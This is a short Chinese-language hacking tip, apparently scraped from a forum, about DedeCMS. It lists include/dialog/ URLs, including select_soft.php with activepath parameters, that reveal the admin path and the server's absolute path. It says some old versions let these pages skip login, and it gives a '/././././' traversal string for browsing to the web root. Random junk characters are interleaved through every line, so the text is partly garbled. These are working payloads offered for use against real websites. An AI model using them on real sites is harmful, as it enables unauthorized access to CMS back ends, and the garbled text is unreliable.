1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理0 e$ B3 Z5 B) |7 A, {6 K
, e" k6 E; A! {0 v4 R, U* G* k员帐号,新版本的就直接转向了后台.. H# n+ _% p q2 w
, }# @! ]' c& B6 n$ l& \0 d6 ?* {) n1 x: o2.include/dialog/config.php会爆出后台管理路径' K: U* [0 q4 L+ e
, e( V: Q9 H& \0 |% h3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
) d- o5 i/ X% A7 N' d
( n" V7 B/ y/ ^6 y( F4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.4 m9 ]2 d* H: ~- s& w/ ~; c# f
" s) E! H7 K( R- ^# ` @5 Q
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉9 W7 B1 r. m5 V0 x. _
4 ?' v5 r& N; T* Q' ^到根目录去.不过这些版本的访问地址有些不同.2 t/ W) D5 t& Y$ I0 b8 o) R
地址为require/dialog/select_soft.php?activepath=/././././././././
0 Y2 g/ b) V I: U6 h% g2 z
( z+ g0 | {6 V1 Ninclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
2 q5 |6 _; q3 Q/ x6 N, M存在相同问题的文件还有1 h1 O- @/ w% v2 f- F
include\dialog\select_images.php6 b s6 _( i c. g: E
include\dialog\select_media.php6 m6 b( W; l" P% I U6 s7 m+ M0 i o
include\dialog\select_templets.php- R' W" U- i9 ?; r( @4 H9 {7 O
|